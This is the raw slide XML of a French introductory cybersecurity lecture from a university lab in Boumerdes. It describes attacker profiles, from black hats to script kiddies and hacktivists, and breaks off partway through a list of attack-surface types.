        <p:nvSpPr>
          <p:cNvPr id="3" name="Sous-titre 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-69012" y="6180642"/>
            <a:ext cx="9144000" cy="540833"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Réalisé par : Dr MESBAH</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Sous-titre 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1739900" y="191541"/>
            <a:ext cx="8420100" cy="1116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fr-FR" sz="3600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Adobe Arabic" panose="02040503050201020203" pitchFamily="18" charset="-78"/>
                <a:cs typeface="Adobe Arabic" panose="02040503050201020203" pitchFamily="18" charset="-78"/>
              </a:rPr>
              <a:t>Université M’Hamed BOUGARA - Boumerdes </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="3600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Adobe Arabic" panose="02040503050201020203" pitchFamily="18" charset="-78"/>
                <a:cs typeface="Adobe Arabic" panose="02040503050201020203" pitchFamily="18" charset="-78"/>
              </a:rPr>
              <a:t>Laboratoire LIMOSE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 2" descr="C:\Users\acer\Downloads\limose-logo.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9728200" y="177800"/>
            <a:ext cx="2311400" cy="1362060"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>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33640"/>
            <a:ext cx="2327795" cy="1650380"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Espace réservé du numéro de diapositive 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{6951A42B-171D-4B94-AECE-9A114FAB7514}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>1</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4276179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838200" y="0"/>
            <a:ext cx="10515600" cy="805753"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Profile des attaquants</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Rectangle 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="881739" y="639627"/>
            <a:ext cx="5133600" cy="1800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lvl="0" algn="ctr" defTabSz="889000">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="35000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Black </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (chapeau noir)</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" defTabSz="889000">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="35000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-Ils ne respectent pas la loi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" defTabSz="889000">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="35000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-Ils pénètrent par effraction dans les systèmes dans un intérêt qui n’est pas celui des propriétaires</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" defTabSz="889000">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="35000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-Ils créent des malwares(virus, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>trojan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>…)</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="275698" y="634044"/>
            <a:ext cx="914022" cy="1371034"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId3" cstate="print">
              <a:extLst>
                <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                  <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                </a:ext>
              </a:extLst>
            </a:blip>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect l="-14000" r="-1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9" name="Rectangle 28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6825343" y="628741"/>
            <a:ext cx="5134499" cy="180000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lvl="0" algn="ctr" defTabSz="889000">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="35000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>White </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (chapeau </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>blanc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="889000">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="35000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-Un hackeur éthique, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Aident à la sécurisation du système</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" defTabSz="889000">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="35000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Leurs actions menées sont très proches de celles des chapeaux noirs</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Réalise des tests de pénétration et recherche de vulnérabilités</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Rectangle 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6204994" y="631577"/>
            <a:ext cx="914022" cy="1371034"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId4"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Rectangle 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="881739" y="2732213"/>
            <a:ext cx="5133600" cy="1800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lvl="0" algn="ctr" defTabSz="889000">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="35000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Gray </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (chapeau gris)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" defTabSz="889000">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="35000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-Un hybride des deux précédents(Black et white)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" defTabSz="889000">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="35000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-Agit parfois avec l’esprit d’un chapeau blanc, parfois avec celui d’un chapeau noir</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" defTabSz="889000">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="35000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-Intention pas mauvaise mais il commet occasionnellement des délits</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="Rectangle 33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="286586" y="2732213"/>
            <a:ext cx="914022" cy="1371034"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId5" cstate="print">
              <a:extLst>
                <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                  <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                </a:ext>
              </a:extLst>
            </a:blip>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect l="-16000" r="-1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5" name="Rectangle 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6826242" y="2634188"/>
            <a:ext cx="5133600" cy="1800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lvl="0" algn="ctr" defTabSz="889000">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="35000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>kiddies</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" defTabSz="889000">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="35000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-Jeunes hackers (jeunes utilisateurs du réseau) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" defTabSz="889000">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="35000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-Utilisent des programmes trouvés sur Internet (Généralement laissés par white </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" defTabSz="889000">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="35000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-Les exécutent sur des machines sans aucune </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>connaissance</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="Rectangle 36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6231087" y="2663665"/>
            <a:ext cx="914022" cy="1371034"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId6">
              <a:extLst>
                <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                  <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>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9" name="Rectangle 38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="881739" y="4692204"/>
            <a:ext cx="3117778" cy="1134288"/>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lvl="0" algn="ctr" defTabSz="889000">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="35000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hackiviste</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1600" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" defTabSz="889000">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="35000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1050" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Utilisent </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>des compétences de piratage à des fins politiques. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1050" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" sz="1050" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" sz="1050" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-Ils </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>essaient généralement de défigurer ou de perturber les services plutôt que de voler des données ou de l'argent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1050" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="Rectangle 41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4190996" y="4690224"/>
            <a:ext cx="3117778" cy="1134288"/>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lvl="0" algn="ctr" defTabSz="889000">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="35000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cyber </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>terrorist</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1600" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="Rectangle 42"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7500253" y="4690224"/>
            <a:ext cx="3117778" cy="1134288"/>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lvl="0" algn="ctr" defTabSz="889000">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="35000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Suicide Hackers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="217557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Surface des attaques</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="289559" y="805751"/>
            <a:ext cx="7025641" cy="5333791"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>La </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>surface d'attaque est tout simplement l'ensemble des points qui sont susceptibles d'être </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>attaqués.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Il s’agit de tous les matériels, logiciels et composants connexes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>d’un système d’information. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Il s’agit notamment des éléments </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>suivants:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Surface d’attaque </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
              <a:t>logiciel</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Surface d’attaque </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
              <a:t>réseau</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Surface d’attaque </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
              <a:t>humaine</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Surface d’attaque </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
              <a:t>physique</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
